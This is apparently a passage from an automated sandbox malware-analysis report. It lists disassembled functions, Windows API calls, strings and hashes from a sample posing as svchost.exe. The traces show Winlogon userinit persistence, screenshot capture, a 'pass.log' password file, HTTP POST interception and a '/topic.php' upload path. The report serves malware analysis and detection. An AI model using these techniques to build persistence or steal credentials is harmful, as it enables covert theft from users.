                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$A23C41FB$scrs
                                                                                                                                                                                                              • API String ID: 1455050916-2152751632
                                                                                                                                                                                                              • Opcode ID: 20a78be696418230216b9936fb0f767e02e7802fd80901a4ff16423ebd7cb7fe
                                                                                                                                                                                                              • Instruction ID: ae1d40a63ec7b4eb405eba757877437fdeef43cb4348ec6e26866b1c6584551b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20a78be696418230216b9936fb0f767e02e7802fd80901a4ff16423ebd7cb7fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2314B75D013194BCB209B749C98BEB77E8FF49744F840695EA8AD3240DB70DB44CBA0
                                                                                                                                                                                                              Function 02CAF2D0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 109sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C40D7), ref: 02CAF2F7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAF33B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAF347
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAF34B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAF35C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAF363
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CAF390
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAF39F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAF3A5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAF3A9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAF3BA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAF3C1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CAF3EF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CAF405
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$A23C40D7$scrs
                                                                                                                                                                                                              • API String ID: 1455050916-2156589013
                                                                                                                                                                                                              • Opcode ID: 116a6ef5770d9b93dac9f1640f137bad1da2672a5df6d29bebe238f6bfaadaca
                                                                                                                                                                                                              • Instruction ID: 39a2ea7167fe62166fac2a5e5e8700d42c05c7a7716a0876ae955e3cb33bbf7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 116a6ef5770d9b93dac9f1640f137bad1da2672a5df6d29bebe238f6bfaadaca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A93148319462194BCB10DB789C68BEEBBE8BF55344F844998E989D3140DFB1DA94CBA0
                                                                                                                                                                                                              Function 02CB4A10 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 175registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,74DF30D0,00000000), ref: 02CB4A43
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,75A90180), ref: 02CB4A6D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02CB4A8D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02CB4ABA
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02CB4ABE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02CB4B60
                                                                                                                                                                                                                • Part of subcall function 02CA41B0: GetProcessHeap.KERNEL32(00000000,00000000,02CA3D17,02C978C7), ref: 02CA41BE
                                                                                                                                                                                                                • Part of subcall function 02CA41B0: HeapValidate.KERNEL32(00000000), ref: 02CA41C1
                                                                                                                                                                                                                • Part of subcall function 02CA41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA41CE
                                                                                                                                                                                                                • Part of subcall function 02CA41B0: HeapFree.KERNEL32(00000000), ref: 02CA41D1
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02CB4B71
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CB4B7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 579956326-2103896814
                                                                                                                                                                                                              • Opcode ID: 17fb9d69bd90eab82fe71b6d87a9a21a77e53cde67e6469ecfcf9ca6943bc45f
                                                                                                                                                                                                              • Instruction ID: 02ae5a3639810fe3bc72f92341fb37b03c0f291d3d39f86db8b321ebd7541c9e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17fb9d69bd90eab82fe71b6d87a9a21a77e53cde67e6469ecfcf9ca6943bc45f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F517835A44206EFEB358B249CA8FFAB7B9EF84744F504684EA41EB201D770AA05C790
                                                                                                                                                                                                              Function 02CB2390 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c45b7), ref: 02CB23B7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB23F9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB2405
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2409
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB241A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB2421
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB2452
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB2458
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB245C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB246D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB2474
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB24A2
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CB24B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$a23c45b7$scrs
                                                                                                                                                                                                              • API String ID: 224938940-2552538418
                                                                                                                                                                                                              • Opcode ID: 4a2551720ac3277a059afc8c3c76227e942ee04e384063971e8fd3493fe71708
                                                                                                                                                                                                              • Instruction ID: 8a46fc953ed8c33efea208383f8ded879ea31cc00367dddb58b62242562df440
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a2551720ac3277a059afc8c3c76227e942ee04e384063971e8fd3493fe71708
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4312731D452194BDB11DB789C58BEEBBE8EF95340F844994E9C9D3140DBB0DA84CFA1
                                                                                                                                                                                                              Function 02CB1320 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C42B7), ref: 02CB1347
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB1389
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB1395
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB1399
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB13AA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB13B1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB13E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB13E8
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB13EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB13FD
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB1404
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB1432
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CB1448
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$A23C42B7$scrs
                                                                                                                                                                                                              • API String ID: 224938940-2709511570
                                                                                                                                                                                                              • Opcode ID: d3000d0b1f5debe3a902aa5e5720586cf3828c5cfd2f9158efcca6d24ed1fba4
                                                                                                                                                                                                              • Instruction ID: 77fee8cfaed58a46856ff04071a009156df0deb96b6b011e9d695dcbb922688e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3000d0b1f5debe3a902aa5e5720586cf3828c5cfd2f9158efcca6d24ed1fba4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49314931D452184BCF11DB789C58BEBBBE8EF95740F884594E88DD3140EBB0DA84CBA0
                                                                                                                                                                                                              Function 02CB3080 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB30A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB30E9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB30F5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB30F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB310A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB3111
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB3142
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB3148
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB314C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB315D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB3164
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB3192
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CB31A8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$A23C4505$scrs
                                                                                                                                                                                                              • API String ID: 224938940-2642785410
                                                                                                                                                                                                              • Opcode ID: cabff1dc15236f7124519af191a05e0a64e72f1edf5730d64368f9e6ba8eb396
                                                                                                                                                                                                              • Instruction ID: 396a1c2675205c90df856a04fea5134a530b274209e8d69df9a5c7dca13132ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cabff1dc15236f7124519af191a05e0a64e72f1edf5730d64368f9e6ba8eb396
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63312731D452585BDB21DB78AC58BEAB7ECEF95340F8449D4E989D3240DBB0DA84CBA0
                                                                                                                                                                                                              Function 02CA5090 Relevance: 27.1, APIs: 18, Instructions: 133memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,74DF3050,74DF30D0,74DF3080), ref: 02CA50B7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA50BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA50CE
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 02CA50F5
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02CA5113
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA511D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA5120
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA512D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA5130
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02CA5148
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA514F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA515F
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02CA5175
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 02CA51A1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02CA51D1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA51D4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02CA51E4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA51E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1718479325-0
                                                                                                                                                                                                              • Opcode ID: 506f1a530cb887925523c49ab5b8c0fa20c39c1ad18489ef99efd81055c8709d
                                                                                                                                                                                                              • Instruction ID: 13c09ec472a1df7cd4a9f370d9220887e136142fcb82f1855ce572da6f7b4893
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 506f1a530cb887925523c49ab5b8c0fa20c39c1ad18489ef99efd81055c8709d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D441C431E41306ABDB209F65CC58FAE7B68AF84799FD5C614EA05E7180DB71D640CBA0
                                                                                                                                                                                                              Function 02CA5200 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 210stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA5250
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA527C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,0000001C,0000001C), ref: 02CA52A3
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000005), ref: 02CA52D4
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA52FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02CA5315
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(-00000010), ref: 02CA5323
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA5355
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                              • String ID: $Content-Length: $POST
                                                                                                                                                                                                              • API String ID: 2509092961-2076583852
                                                                                                                                                                                                              • Opcode ID: 4d62b43948faa9ccc5a6eb61d34a229d25fb78688f31b53cdd18382da24f30f7
                                                                                                                                                                                                              • Instruction ID: d839aad3c6a9dbc6ac89ed9ca84405e33f18fb16ede6321b51fb2cb6546f3882
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d62b43948faa9ccc5a6eb61d34a229d25fb78688f31b53cdd18382da24f30f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F716071D40316EFDB10CFA8D894BAEBBF9FB48758B448629E509E7240D7719A11CFA0
                                                                                                                                                                                                              Function 02CAE1B0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 167stringthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAE1D1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02CAE209
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAE23D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAE273
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(00000000), ref: 02CAE2B9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAB980,00000000,00000000,00000000), ref: 02CAE338
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAE350
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAE361
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CAE387
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CAE3C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                              • String ID: <L>$A23C41FB$POST$bsi.dll$pass.log
                                                                                                                                                                                                              • API String ID: 4177962767-489971995
                                                                                                                                                                                                              • Opcode ID: f50fabfa8db815b8ee9def341dcb0815af72ad5f64543294b4d25ae531fbc78b
                                                                                                                                                                                                              • Instruction ID: ba8558e978047bec48b88f44d7f3ef9b2f1816a404b7b524dd003dd3e409d243
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f50fabfa8db815b8ee9def341dcb0815af72ad5f64543294b4d25ae531fbc78b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71512C31D41306DFDB25AF34E8287EA7FA5BB84718F144764E9499B240DB70DA58CBD0
                                                                                                                                                                                                              Function 02CA3800 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 164memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA3821
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA383C
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,74DF0F00,00000000,00000000), ref: 02CA3856
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,74DF0F00,00000000,00000000), ref: 02CA386C
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96CA1
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96CBF
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02C96CDB
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegQueryValueExA.KERNEL32(?,5DD2BAAFa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C96D02
                                                                                                                                                                                                                • Part of subcall function 02C96C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96D7A
                                                                                                                                                                                                                • Part of subcall function 02C96C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96D81
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96D95
                                                                                                                                                                                                                • Part of subcall function 02C96C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96DAE
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02C96DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA38BB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA38C2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA38CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA38D5
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,74DF0F00), ref: 02CA394D
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,74DF0F00,00000000,00000000), ref: 02CA395A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA3998
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA399B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA39A7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,74DF0F00,00000000,00000000), ref: 02CA39AA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: /topic.php
                                                                                                                                                                                                              • API String ID: 870369024-224703247
                                                                                                                                                                                                              • Opcode ID: 336ed19402a7947273d6893ab3410290ce7ca5538a8da404c3b1b8384b2b8a07
                                                                                                                                                                                                              • Instruction ID: 6ec337c64ded41204b2a1a55eac20fbcb5353429b1202597d28109f3a6489d29
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 336ed19402a7947273d6893ab3410290ce7ca5538a8da404c3b1b8384b2b8a07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B65139B29411596FCB209EB49CA8FEFBB6CEB84304F444A9AF541D7140D771DE84CBA0
                                                                                                                                                                                                              Function 02CACE88 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 162COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CACEA7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CACEE1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CACEEB
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CACEF3
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CACF04
